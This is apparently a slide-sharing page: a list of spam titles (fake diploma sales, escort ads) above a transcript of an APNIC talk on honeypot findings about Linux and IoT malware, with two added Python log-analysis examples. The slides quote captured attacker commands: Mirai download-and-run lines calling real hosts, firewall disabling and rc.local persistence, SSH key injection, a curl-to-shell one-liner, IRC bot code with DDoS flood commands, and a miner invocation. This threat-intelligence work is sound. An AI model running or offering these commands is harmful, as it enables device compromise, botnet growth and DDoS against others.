定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
定制(Management毕业证书)新加坡管理大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Git and Github workshop GDSC MLRITM
Git and Github  workshop GDSC MLRITMGit and Github  workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in  Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in  Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Jamuna Vihar Delhi reach out to us at 🔝9953056974🔝
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

Slide 1: Observations and Lessons Learned from the APNIC Community Honeynet Project
Adli Wahid, Senior Internet Security Specialist, APNIC
adli@apnic.net

Slide 2: Let's Connect!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP key fingerprint: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696

Slide 3: Talk Overview
1. APNIC Community Honeynet Project
2. Observations on activities targeting Linux servers and IoT devices
3. Lessons Learned / Reflections

Slide 4: Overview of the APNIC Community Honeynet Project

Slide 5: APNIC Community Honeynet Project
• Context
  – Educational: using honeypots to understand network security attacks and threats, as part of our network security training
  – Situational awareness, the bigger picture, cooperation with other stakeholders, tools (e.g. the MISP threat sharing platform, Wireshark, Suricata)
• Collaboration
  – Partners deploy honeypots, APNIC runs the backend
  – Information collected among partners and threat sharing*
• Outcomes
  – More than 50 distributed honeypots* in the AP region since 2017
  – Threat information shared with APNIC members and partners (e.g. CERTs/CSIRTs, network operators)
• https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind-the-scenes/
• https://dash.apnic.net

Slide 6: APNIC Community Honeypot
1. Purpose and Placement
  o Research & Alerting – Internet
2. Type of Honeypots
  o Cowrie, Dionaea, RDPHoney
3. Deployment
  – Community Honey Network (fork of Modern Honey Network)
  – Partners & Self Hosting
4. Data Collection & Analysis & Action
  – Logs, Visualization, Alert, Action (Incident Response)
  – Elasticsearch, Kibana, Logstash, Beats
  – Suricata IDS
  – ElastAlert + Slack
5. Maintenance
  – Ansible
  – LibreNMS
[Screenshots: Detection with Suricata rulesets; Slack alert]

Slide 7: Community Honeynet Infrastructure
[Diagram: distributed honeypots → hpfeeds → CHN / MHN server → Filebeats (json) over TLS → Logstash → Elasticsearch (and BigQuery); ElastAlert and Kibana read from Elasticsearch]
MHN – Modern Honey Network
CHN – Community Honey Network

Slide 8: [Dashboard screenshot] * Traffic from the last 30 days

Slide 9: [Dashboard screenshot]

Slide 10: [Dashboard screenshot]

Slide 11: Country View – Pakistan (Last 90 days)

Slide 13: Linux/Unix Malware
• Routers, IoT devices and servers run Linux/Unix based OS
• Not new but pervasive
  – Targets are exposed on the Internet (HTTP, Telnet, SSH)
  – Unpatched / unmonitored (e.g. no antivirus, firmware upgrades not applied)
  – Default/weak credentials
• Popular example: Mirai (DDoS agent)
  – Source code was shared publicly
  – Many variants: josho, owari, masuta, sora, etc.
  – Gafgyt
• Simple technique of infecting, spreading and persisting
• Interesting scenarios
  – Working from home
  – Servers / hosting / cloud

Slide 14: Different Perspectives of a DDoS
[Diagram labels: My Network / Infrastructure / Host; Source; Target / Victim Perspective; Attacker Perspective]

Slide 15: Service & Attacker Infrastructure
• Setting up the infrastructure
• Misconfigured services
  – Servers: NTP, DNS, SSDP, etc.
  – Amplification attack: spoof the source of the request
  – https://stats.cybergreen.net/
  – https://www.shadowserver.org/what-we-do/network-reporting/get-reports
• Active bot "recruitment"
  – Internet-exposed services
  – Vulnerable devices
  – Weak credentials

Slide 18: "Recruitment Process"
[Diagram: Attacker → (1) Scan and gain access: brute force (Username: admin, password: 12345) or Remote Code Execution via web interface → (2) Download binary / execute (wget http://37.x.2x.190:80/13747243572475/hx86_64) → Connect to Command and Control (C&C)]

Slide 19: Telnet/SSH Honeypot (Cowrie)
• Emulates SSH / Telnet
  – Allows the attacker to log in
• Emulates a Linux/Unix environment
  – Captures the commands issued by the attacker after login
  – Including downloads
• "Look and feel" of Linux/Unix servers and IoT devices
• Attracts a certain class of attacks
  – Scan for SSH/Telnet
  – Brute-force username/password
  – Login & execute payload(s)
• DDoS agents & cryptominers
  – Based on post-login activities and binaries collected
[Screenshot: Mirai sample – 2016]

Slide 20: Successful Logins – New Honeypot
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:50.568233Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "123.b.c.12",
  "session": "fd7977b0b54a",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
{
  "eventid": "cowrie.login.success",
  "username": "root",
  "timestamp": "2018-10-07T19:31:59.378766Z",
  "message": "login attempt [root/taZz@23495859] succeeded",
  "src_ip": "80.x.y.62",
  "session": "fdcd399b1282",
  "password": "taZz@23495859",
  "sensor": "mn-001"
}
Check out: https://www.bankinfosecurity.com/botnets-keep-brute-forcing-internet-things-devices-a-
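The two events on this slide share one unusual password, used from two unrelated source addresses nine seconds apart, which is what a botnet working a shared credential list looks like rather than a human operator. The following Python is an added example, not code from the APNIC project or the slides: it parses Cowrie JSON lines like these, keeps the cowrie.login.success events and raises one alert per credential that succeeded from two or more distinct source IPs, in the shape an ElastAlert rule feeding Slack (slide 6) might emit. The sample events, the rule name and the alert field names are constructed; the IP addresses use documentation ranges.

```python
"""Correlate Cowrie successful logins across source IPs.

Added example, not the APNIC Community Honeynet Project's code. The sample
log lines and the alert format are constructed.
"""
import json
from collections import defaultdict
from datetime import datetime, timezone

# Constructed Cowrie JSON-lines output: three successful logins, one failure.
SAMPLE_LOG = """\
{"eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:50.568233Z", "src_ip": "192.0.2.12", "session": "fd7977b0b54a", "password": "taZz@23495859", "sensor": "mn-001"}
{"eventid": "cowrie.login.failed", "username": "admin", "timestamp": "2018-10-07T19:31:55.000000Z", "src_ip": "198.51.100.7", "session": "0a1b2c3d4e5f", "password": "admin", "sensor": "mn-001"}
{"eventid": "cowrie.login.success", "username": "root", "timestamp": "2018-10-07T19:31:59.378766Z", "src_ip": "203.0.113.62", "session": "fdcd399b1282", "password": "taZz@23495859", "sensor": "mn-001"}
{"eventid": "cowrie.login.success", "username": "pi", "timestamp": "2018-10-07T19:40:01.000000Z", "src_ip": "198.51.100.9", "session": "aabbccddeeff", "password": "raspberry", "sensor": "mn-002"}
"""


def parse_events(text):
    """Parse JSON-lines Cowrie output, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line must not abort the whole batch
    return events


def _ts(event):
    """Cowrie timestamps are ISO 8601 with microseconds and a trailing Z."""
    return datetime.strptime(event["timestamp"], "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)


def shared_credentials(events, min_sources=2):
    """Map (username, password) -> sorted src_ips for credentials that
    succeeded from at least ``min_sources`` distinct source addresses."""
    sources = defaultdict(set)
    for ev in events:
        if ev.get("eventid") == "cowrie.login.success":
            sources[(ev["username"], ev["password"])].add(ev["src_ip"])
    return {cred: sorted(ips) for cred, ips in sources.items() if len(ips) >= min_sources}


def build_alerts(events, min_sources=2):
    """One alert dict per shared credential (hypothetical ElastAlert-like shape)."""
    successes = [ev for ev in events if ev.get("eventid") == "cowrie.login.success"]
    alerts = []
    for (user, pw), ips in shared_credentials(events, min_sources).items():
        hits = [ev for ev in successes if (ev["username"], ev["password"]) == (user, pw)]
        first, last = min(hits, key=_ts), max(hits, key=_ts)
        alerts.append({
            "rule": "cowrie_shared_credential",
            "username": user,
            "password": pw,
            "src_ips": ips,
            "sensors": sorted({ev["sensor"] for ev in hits}),
            "sessions": sorted(ev["session"] for ev in hits),
            # how long the campaign took between first and last success
            "window_seconds": int((_ts(last) - _ts(first)).total_seconds()),
        })
    return alerts


if __name__ == "__main__":
    for alert in build_alerts(parse_events(SAMPLE_LOG)):
        print(json.dumps(alert, indent=2))
```

Lowering min_sources to 1 turns the same function into a plain inventory of every credential that worked, which is the list a honeypot operator feeds back into the "weak or default credentials" finding on the lessons-learned slide.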
Slide 21: Execute Payload
#!/bin/sh
cd /tmp || cd /honme/$USER || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; busybox wget http://185.10.68.175/bins/mirai.mips -O mirai.mips; tftp -r mirai.mips -g 185.10.68.175; busybox tftp -r mirai.mips -g 185.10.68.175; chmod 777 mirai.mips; ./bins/mirai.mips; rm -rf mirai.mips

Slide 22: [Captured post-login commands]
/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://116.211.145.29:8887/dx;chmod 777 dx;./dx;echo "cd /tmp/">>/etc/rc.local;echo "./dx&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local;

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

echo -e "passwordn1o53kTj3yZq9n1o53kTj3yZq9"|passwd|bash

system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://spacewb.tech/poll/bd54f492-5909-49dd-bf2e-efbe029383ce mode=http dst-path=7wmp0b4s.rscrn/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write

Slide 23: Perl script (IRC bot) snippet
my $process = $rps[rand scalar @rps];
my @rversion = ("Phl4nk");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("zombie");
my $ircname = $rircname[rand scalar @rircname];
chop (my $realname = $rircname[rand scalar @rircname]);
my $nick =$rircname[rand scalar @rircname];
my $server = '125.x.y.z53';
my $port = '1947';
my $linas_max='8';
my $sleep='5';
my $homedir = "/tmp";
my $version = 'v.02';
my @admins = ("Nite","NiteMax","Nite123");
#my @hostauth = ("Nite");
my @channels = ("#VPS");

Perl script command: uname -a & curl -O http://[xx].do.am/adm.txt ; perl adm.txt ; rm -rf adm.txt

Slide 24: [Perl IRC bot help handlers; the second block is truncated at the right edge of the slide]
if ($funcarg =~ /^flood/) {
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Flood Help: ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^utils/) {
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1redu`s PerlBot Utils Help:
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <messa
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip>
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example)
  sendraw($IRC_cur_socket, "PRIVMSG $printl :4,1 [Help] 9,1==================================================
}

Slide 25: Source code of an IRC-based bot (built-in command help)
 * Non-spoof / non-root attacks: (can run on all bots)
 * STD <ip> <port> <time> = A non spoof UDP HIV STD flooder
 * HOLD <host> <port> <time> = A vanilla TCP connection flooder
 * JUNK <host> <port> <time> = A vanilla TCP flooder (modded)
 * UNKNOWN <target> <port, 0 for random> <packet size, 0 for random> <secs> = Another non-spoof udp flooder
 * HTTP <method> <target> <port> <path> <time> <power> = An extremely powerful HTTP flooder
 *
 * Spoof / root attacks:
 * DNS <target IP> <port> <reflection file url> <forks> <pps limiter, -1 for no limit> <time> = DNS amplification flooder, use with caution
 * BLACKNURSE <target ip> <secs> = An ICMP flooder that will crash most firewalls, causing them to drop packets.
 *
 * Bot commands:
 * AK-47SCAN <ON/OFF> = Toggles scanner. Started automatically.
 * GETIP <iface> = gets the IP address from an interface
 * FASTFLUX <iface> <ip> <port> = starts a proxy to a port on another ip to an interface (same port)
 * RNDNICK = Randomizes knight nickname
 * NICK <nick> = Changes the nick of the client
 * SERVER <server> = Changes servers
 * GETSPOOFS = Gets the current spoofing
 * SPOOFS <subnet> = Changes spoofing to a subnet
 * DISABLE = Disables all packeting from the knight
 * ENABLE = Enables all packeting from the knight
 * KILL = Kills the knight
 * GET <http address> <save as> = Downloads a file off the web
 * VERSION = Requests version of knight
 * KILLALL = Kills all current packeting
 * HELP = Displays this
 * IRC <command> = Sends this command to the server
 * SH <command> = Executes a command
 * BASH <command> = Run a bash command
 * ISH <command> = Interactive SH (via privmsg)
 * SHD <command> = Daemonize command
 * INSTALL <http://server/bin> = Install binary (via wget)
 * BINUPDATE <http://server/bin> = Update a binary (via wget)
 * LOCKUP <http://server/bin> = Kill telnet, install a backdoor!

Slide 26: Linux/Mirai – Fbot
https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html
2020-07-16T10:47:34.498718Z - URL seen http://5.x.y.228/bot.x86_64 on sensor 4da092c7-7234-48dc-a7ab-7eb35979e847 and source ip: x.y.z.119 - ['root', 'juantech']
2020-07-16T11:43:13.797645Z - http://5.x.y.228/bot.x86_64 on sensor f3fedbcf-e79e-44ef-9947-aca33701f8c2 and source ip: x.y.z.97 - ['root', 'hipc3518']

Slide 27: [Screenshot]

Slide 31: [Captured command line]
curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &

Slide 32: Snippet of shell script
if [ ! -f "4d867bd38706a5f7" ]; then
  ARCH=$(getconf LONG_BIT)
  if [ ${ARCH}x = "64x" ]; then
    (curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -o 4d867bd38706a5f7
     ||wget -T180 -q img.sobot.com/chatres/89/msg/20190814/ced05f4d38ac4090a3b8cb3196c6bd4f.png -O 4d867bd38706a5f7
     ||curl -fsSL -m180 never.b-cdn.net/x64 -o 4d867bd38706a5f7
     ||wget -T180 -q never.b-cdn.net/x64 -O 4d867bd38706a5f7
     ||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -o 4d867bd38706a5f7
     ||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1565754278188/3.1437250848801557.jpg -O 4d867bd38706a5f7)

Slide 33: Find hash related to URL serving malware
a5fba021a41c520a81647cda41110033eba4f8842eb3239f227bcbb0b1b110d6

Slide 34: [Screenshot]

Slide 35: Rocke Gang
1. https://isc.sans.edu/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916 (May 2019)
2. https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers (May 2019)
3. https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect (Oct 2019)
4. https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/ (Oct 2019)

Slide 36: [Process listing of a miner running under the web server account]
www-data 17838 0.0 0.0 4452 636 ? S Mar20 0:00 sh -c /bin/bash -i -c '( while true ; do /var/www/[truncated]default/files/media-icons/xm2sg -l /var/www/[truncated]/files/media-icons/out.txt -o pool.minexmr.com:4444 -u 49DmzgK76Bo8WUa4LzTMs9TuT4Pj5FwM4FKuaNR1LmNvSPbPcTFi1ZsbVjJcQDY5hZ9i18A88g86TfdXi83P4uEoGyD5eTc.0+10000 -k >& /dev/udp/127.0.0.1/1 0>&1 ; if [ ! -f /var/www/[truncated]/files/media-icons/xm2sg ] || [ $? -eq 126 ]; then break; fi; sleep 1 ; done )

Slide 37: Analysis – Interesting indicators
• IP addresses of the hosts used for initial access and for running the script that downloads the binary/malware
  – Normally compromised systems
• IP addresses of hosts serving the binary/malware and other artefacts
• IP addresses/domains of command and control
• Binaries, scripts, malware samples, source code (+ hashes)
• SSH keys, webshells, group names, IRC #channels
• Miner-related information
• Correlate with other observations, reports, etc.

Slide 39: Lessons Learned
• Context: how can we "improve" security?
• Bad practices
  o Telnet enabled by default on devices
  o Weak or default credentials not removed
  o Services not developed securely
  o Services not deployed securely (e.g. management interfaces shouldn't be exposed on the Internet)
  o No action upon notification ("not our device, it is the customer's")
• Miscreants will exploit the weaknesses and monetize them

Slide 45: Source IP from TO
2020-10-16T06:53:37.404513Z - cowrie : Traffic from IP address: x.z.y.56 src_port: 33903 dest_port: 23 ASN Info: XYZ , 38201 , x.z.y.0/21
[Screenshot: AbuseIPDB]
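Turning the captured sessions from slides 21, 22 and 36 into the indicator classes listed on slide 37 (hosts serving binaries, injected SSH keys, persistence, miner pools and wallets), and attaching the "ASN Info: name , asn , prefix" enrichment shown on the alert line above, is a small parsing job. The following Python is an added example, not the APNIC project's tooling: the command inputs, the prefix table (documentation prefixes and ASNs only), the record field names and the persistence tags are constructed, and a deployment would replace ASN_TABLE with a routing-table or whois-derived prefix list. It generalises slightly beyond the slides in that the lookup is a longest-prefix match, so a more specific announcement wins over a covering aggregate.

```python
"""Indicator extraction and ASN enrichment for Cowrie command input.

Added example, not the APNIC Community Honeynet Project's code. Sample
records, prefixes and ASNs are constructed (documentation ranges only).
"""
import ipaddress
import re

# Constructed records in the shape of cowrie.command.input events.
SAMPLE_COMMANDS = [
    {"src_ip": "192.0.2.12",
     "input": "cd /tmp || cd /var/run || cd /; wget http://198.51.100.20/bins/bot.mips -O bot.mips; "
              "tftp -r bot.mips -g 198.51.100.20; chmod 777 bot.mips; ./bot.mips"},
    {"src_ip": "203.0.113.62",
     "input": 'cd ~ && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0exampleKEY== mdrfckr" '
              '>> .ssh/authorized_keys && chmod -R go= ~/.ssh'},
    {"src_ip": "203.0.113.62",
     "input": "curl -fsSL http://203.0.113.200:8887/dx -o dx; chmod +x dx; "
              "./dx -o pool.example.net:4444 -u 49DmzgKexampleWALLET.0+10000 -k"},
]

URL_RE = re.compile(r"\bhttps?://[^\s'\";|&)]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SSH_KEY_RE = re.compile(
    r"\b(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)(?:\s+([^\s\"']+))?")
POOL_RE = re.compile(r"-o\s+([A-Za-z0-9.\-]+:\d+)")   # xmrig-style "-o host:port"
WALLET_RE = re.compile(r"-u\s+(\S+)")                   # xmrig-style "-u wallet[.worker]"

# Persistence markers worth flagging (slide 22 shows both techniques).
PERSISTENCE = (("ssh_authorized_keys", "authorized_keys"), ("rc_local", "rc.local"))

# Constructed ASN table: (prefix, asn, name). The /25 is deliberately more
# specific than the covering /24 so that longest-prefix match is exercised.
ASN_TABLE = [
    (ipaddress.ip_network("192.0.2.0/24"), 64496, "EXAMPLE-ISP-A"),
    (ipaddress.ip_network("192.0.2.128/25"), 64497, "EXAMPLE-HOSTING-B"),
    (ipaddress.ip_network("203.0.113.0/24"), 64498, "EXAMPLE-CABLE-C"),
]


def extract_indicators(record):
    """Pull the slide-37 indicator classes out of one command-input record."""
    cmd = record["input"]
    return {
        "src_ip": record["src_ip"],
        "download_urls": URL_RE.findall(cmd),          # hosts serving binaries
        "hosts": sorted(set(IPV4_RE.findall(cmd))),    # bare IPs, e.g. from tftp -g
        "ssh_keys": [{"type": m.group(1), "key": m.group(2), "comment": m.group(3) or ""}
                     for m in SSH_KEY_RE.finditer(cmd)],
        "persistence": [tag for tag, needle in PERSISTENCE if needle in cmd],
        "miner_pools": POOL_RE.findall(cmd),
        "wallets": WALLET_RE.findall(cmd),
    }


def asn_lookup(ip, table=ASN_TABLE):
    """Longest-prefix match of ip against table; returns (name, asn, network) or None."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, asn, name in table:
        if addr in net and (best is None or net.prefixlen > best[2].prefixlen):
            best = (name, asn, net)
    return best


def asn_info_line(ip, table=ASN_TABLE):
    """Render the enrichment in the 'ASN Info: name , asn , prefix' form of the alert line."""
    hit = asn_lookup(ip, table)
    if hit is None:
        return f"ASN Info: no match for {ip}"
    name, asn, net = hit
    return f"ASN Info: {name} , {asn} , {net}"


def enrich(records, table=ASN_TABLE):
    """Indicators plus source-ASN enrichment for every record."""
    out = []
    for rec in records:
        ind = extract_indicators(rec)
        ind["src_asn"] = asn_lookup(rec["src_ip"], table)
        ind["asn_info"] = asn_info_line(rec["src_ip"], table)
        out.append(ind)
    return out


if __name__ == "__main__":
    for ind in enrich(SAMPLE_COMMANDS):
        print(ind["asn_info"], ind["download_urls"], ind["persistence"], ind["miner_pools"])
```

The ASN and prefix are what make the notification actionable: the indicators identify the attacker's infrastructure, while the prefix tells you which network operator or CERT to notify about the compromised source, which is the cooperation step the project's threat-sharing outcome on slide 5 depends on.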
Slide 46: Back to the drawing board?
• Keeping the Internet safe and secure for _everyone_
• Education: users, operators, developers
• Governance
  – Incident response
  – Roles and responsibilities
  – Accountabilities

Slide 48: Thank You!
LinkedIn: Adli Wahid
Email: adli@apnic.net
Twitter: @adliwahid
PGP: 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
https://www.unsplash.com/adliwahid